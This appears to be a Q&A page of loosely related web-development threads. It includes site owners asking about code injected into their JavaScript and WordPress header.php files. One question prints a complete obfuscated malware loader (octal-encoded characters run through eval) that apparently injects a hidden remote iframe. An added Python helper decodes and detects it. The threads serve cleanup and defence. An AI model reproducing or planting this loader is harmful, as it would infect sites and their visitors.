Malicious? Code in my JS file that wasn't there previously - javascript

I don't know too much about web security, but I found a piece of code in a JavaScript file of mine yesterday that would not have been added by me or anyone else with access to my website.
Nothing bad seems to have been happening on the site, so I wouldn't have worried that much, except that I have been consistently told by Google AdWords that I have malware on my website. Every time I ask them to investigate, however, neither they nor Google Search Console can find anything.
The piece of code in question was something like this:
<script type="text/javascript" src="http://synchronize.exsads.com/click.js"></script>
The only reason I found it was that it gave me an error in the dev console because the file couldn't be loaded.
I have no idea how the code got there. I've been trying to read up on code injection and XSS attacks, but I don't really understand it, and it seems like that has more to do with sending malicious code back to a server instead of actually changing the code within files. (Please correct me if I'm wrong.)
Is there a specific security vulnerability that would allow someone to access the code on my website, and if so, what steps do I have to take to prevent that? (Details or easy-to-understand resources please, much appreciated!)

That JS inserts ads on your site.
Search manually for a strange PHP file (I'll assume PHP); they generate extra HTML and insert some ads on your site.
EDIT
OK, it's not a CMS. Change your FTP password and your access to cPanel or Plesk.
Follow these steps: connect over FTP to the files on your hosting and look for an obvious .php or .js file with a strange name; that file is the corrupted one.
Other solution: download the whole site over FTP and scan it with a good antivirus.

Related

How to do a server redirect of URL to a different URL if the traffic is accessing from static QR code

I've always found this forum helpful. So I'm faced with a big dilemma here and was hoping someone here could help :D
HERE'S THE SITUATION:
We have multiple static QR codes that were printed on thousands of boxes which have already been distributed and that go to the wrong URL. Unfortunately the designer didn't make the QR code dynamic, so we don't have the option of editing the URL through the QR code generator's interface.
We are a white label manufacturer and provide packaging to tons of clients, so what happened was a batch of QR codes got put on the wrong brand's packaging, and as you can imagine it's a huge mess. Hoping someone could help ya girl out! :D
I've decided that our best bet would be to implement automatic redirects of the individual pages on the server side. My question is: is there any type of script that would be able to redirect traffic ONLY coming from a QR code scan? I've heard of Bootstrap being able to route traffic based on device and browser, etc. So I'm remaining hopeful that someone has heard of a way of doing this. And if there is such magical code, what file or table do I need to edit? Btw I have phpMyAdmin but no cPanel.
Thank you SO MUCH in advance!
Side Note -
NO CPANEL! I'm using WordPress 6.1 on WordPress managed hosting through GoDaddy, and so I do not have access to a cPanel unfortunately :(
I tried going through the QR code generator's interface to "edit" the URL of the QR code; however, the QR code was not created as dynamic. It is a static QR code.
And lastly, the reason why we can't simply sticker over the wrong QR code with a new one is that the boxes were already distributed.
Danii
It depends on what URL it goes to. If it goes to your site's domain, e.g. it shows a 404 page of your site or another page, then it is easy to fix. There are plugins for redirection, and the most downloaded free one is Redirection.
Install the plugin
Go to the plugin's settings page
Open the tab "Redirects"
Add a new redirect at the bottom of the page
see the screenshot

Prevent users from reusing website source files (downloading is okay)

UPDATE:
Something's wrong with Stack Overflow. It seems people couldn't read the first line of the question properly and started preaching about "how websites can't be downloaded", which is not exactly the question. So here is the question in a more specific way:
How to get the hosted server's IP address (or any other information which is unique to the hosted server) using jQuery. Googling doesn't help much.
Now, please don't start with "getting the client's IP address" or "this can't be done". I know this is nearly impossible, but if someone can get me close to the idea, that'll do.
Original Question:
I know users can download the source files if they can see them in their browser. What I am trying to do is stop them from reusing them, like checking the IP of the hosting server and redirecting to the original domain if the files are hosted on a different server.
Using PHP (or any server program) won't do, as the end user will be getting the final HTML/CSS/JS files.
Basically, I don't want anyone to download and host/reuse the website files.
Thanks in advance.
JavaScript is code, and can be obfuscated. This makes it so difficult to maintain that it's usually easier for the end user to rewrite it from scratch. Try Googling for "JavaScript obfuscator".
With HTML and CSS, it's pretty much open to the user. Not much you can do about that!
If you make a website in PHP, you write code that gets translated into the final HTML that the user can view and download. So your PHP source file is unreachable for the end user. In WordPress, for example, your code could be only a few rows and the final HTML could be hundreds of rows long, because it reads data from a database and puts it into the HTML.
If you write scripts in JavaScript, you cannot protect them from being downloaded and reused.
This can't be helped. If the viewer can view your website, he can download the front end of the website.
If you're worried about someone downloading your server-side scripts, you don't have to, because the server side cannot be downloaded through the front end.

Why not CDN everything?

It looks like AJAX is indeed unable (at least for all practical purposes) to write foreign HTML to the current page. But what if your CDN website had, say, a JS that would simply document.write() everything? Then your HTML document would have nothing but a remote script.
<html>
<script src="https://pastebin.com/raw.php?i=0wm5v7i6">
</script>
</html>
I tried this. Funny thing is, sometimes it works and other times it does a kind of security error:
Why doesn't this work? What if, on your own website, you simply put everything on an easy host like Google Drive?
What if, on your own website, you simply put everything on an easy host like Google Drive?
That is possible, unless
You want control over your website and don't want to depend on the security and availability of another site, or on somebody reporting your pastebin as abuse and getting it deleted.
You want to make proper use of security features like Content Security Policy and don't want to allow everything from pastebin.com.
You want search engines to find you. Although at least Google does limited interpretation of JavaScript, I doubt that they will handle this content the way you like.
From the looks of it, PasteBin doesn't supply content over SSL (https). You've put https in the URL to your script, but PasteBin just redirects this request to http, and the net effect is that you are trying to access a script over http when the page is accessed over https, and Chrome prevents that.
Just try going to https://pastebin.com/raw.php?i=0wm5v7i6: your browser will be redirected to http://pastebin.com/raw.php?i=0wm5v7i6.

Need to find out how malicious Javascript was injected into my header.php Wordpress theme file

Unfortunately my site was blocked for containing malicious JavaScript by AVG and Google. The malicious code pasted below was somehow injected into the header.php theme file on the latest version of WordPress. I checked all the files and removed any suspicious-looking plugins to make sure this doesn't happen again. The theme is from a very reputable vendor, so I can't see it happening because of the theme. I am looking to know how this was done so that it doesn't happen again.
Host: 1&1 Hosting
WordPress: 3.5.1
PHP: 5.2.17
Running on: Apache
Here is the malicious code:
<script type="text/javascript" language="javascript">
ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,174,174,176,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,174,174,176,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,150,151,161,163,62,147,163,162,170,166,163,160,145,150,161,155,162,155,167,170,166,145,170,155,172,163,62,162,151,170,63,150,170,150,62,164,154,164,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,174,174,176,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,174,174,176,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,1
70,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152
,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
The code you posted above is usually an indication of stolen FTP credentials.
I'm not certain if 1and1 gives you access to FTP logs, but if so, look in there. You may find proof. We've cleaned over 160,000 websites, and we've seen that exact code in sites where we do have access to the FTP logs, and in every case it's been stolen FTP credentials.
The hackers know that many people have FTP access to websites, so their viruses are designed to steal FTP passwords. First, change all passwords. Then don't log in until after you've run a full virus scan of your computer. Don't give out the new passwords until others have run a full system virus scan of their computers.
A good virus cleaner is Malwarebytes.
One thing you should do is search all files for the string 44,152,171 (in your case). The reason is that while you'll find the above code in .htm/.html/.js files, in .php files the hackers use mostly the same code, but it's "echo'd", so many of the special characters are escaped in the .php code.
You'll see maybe an opening PHP tag <?php or the short version <?, followed by a series of spaces, then an identifier #879076# (for instance), then more spaces, then "echo " followed by more spaces and then the opening script tag.
The added spaces are designed to try and hide the malicious code off the screen when viewed with a text editor.
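As an added example (not code from the thread or from the answerer), here is a small Python triage helper for the scheme visible in the posted snippet: it reverses the loader's transform (each token read as octal, minus 4, then fed to String.fromCharCode) and scans file contents for the loader's shape and for the padded PHP "echo" variant the answer describes. The samples it runs on are constructed here; the thread's own payload is not included.

```python
import re

def decode_octal_minus4(blob: str) -> str:
    """Reverse the posted loader's transform: token -> chr(int(token, 8) - 4)."""
    return "".join(chr(int(t.strip(), 8) - 4) for t in blob.split(",") if t.strip())

def encode_octal_plus4(text: str) -> str:
    """Inverse of decode_octal_minus4; used here only to build a constructed sample."""
    return ",".join(format(ord(c) + 4, "o") for c in text)

# Signatures derived from the structure of the posted loader and from the answer's
# description of the PHP variant (padding spaces, a #digits# marker, then echo).
SIGNATURES = {
    "octal_minus4_loader": re.compile(r"parseInt\(\s*\w+\[\w+\]\s*,\s*8\s*\)\s*-\s*\(7-3\)"),
    "eval_fromCharCode_apply": re.compile(r'eval\(\s*\w+\["fromCharCode"\]\.apply'),
    "padded_php_echo": re.compile(r"<\?(?:php)?\s{10,}#\d+#\s{10,}echo\s{5,}<script", re.I),
}

def scan_text(text: str) -> list:
    """Return the names of the signatures found in one file's contents."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def extract_encoded_blobs(text: str, min_tokens: int = 8) -> list:
    """Pull long runs of comma-separated octal numbers (the payload carrier) out of a file."""
    return re.findall(r"(?:[0-7]{2,3},){%d,}[0-7]{2,3}" % (min_tokens - 1), text)

# Constructed sample: the loader's shape wrapped around a harmless payload.
SAMPLE_JS = ('ss=eval("Str"+"ing");a=("'
             + encode_octal_plus4("alert('constructed sample')")
             + '"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}'
             'eval(ss["fromCharCode"].apply(ss,a));')

# Constructed sample of the PHP variant; #879076# is the marker the answer gives as an example.
SAMPLE_PHP = ("<?php" + " " * 60 + "#879076#" + " " * 60 + "echo " + " " * 60
              + '<script type="text/javascript">')

if __name__ == "__main__":
    for label, sample in (("js", SAMPLE_JS), ("php", SAMPLE_PHP)):
        print(label, scan_text(sample))
    for blob in extract_encoded_blobs(SAMPLE_JS):
        print("decoded:", decode_octal_minus4(blob))
```

To triage a real site, run scan_text and extract_encoded_blobs over every .php, .js and .html file pulled down over FTP; decoding a blob shows what the loader would have executed without running it.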

How to dynamically add code to content script based on IP

I wrote a pretty extensive Chrome extension for Mafia Wars on Facebook. The problem is that I gave it to a few people, who gave it to others. What I want is to add my friends' IPs to my server's database, which I can do. But when I give out the extension, I want as little code in it as possible, for obvious reasons. I have found no way to dynamically add more code to a content script, though.
What I can't do:
Keep my code on my server as a JS file and only allow access to the file based on IP, dynamically adding the code to the Chrome extension.
You can inject content script on demand using chrome.tabs.executeScript(). The rest of your plan sounds good.
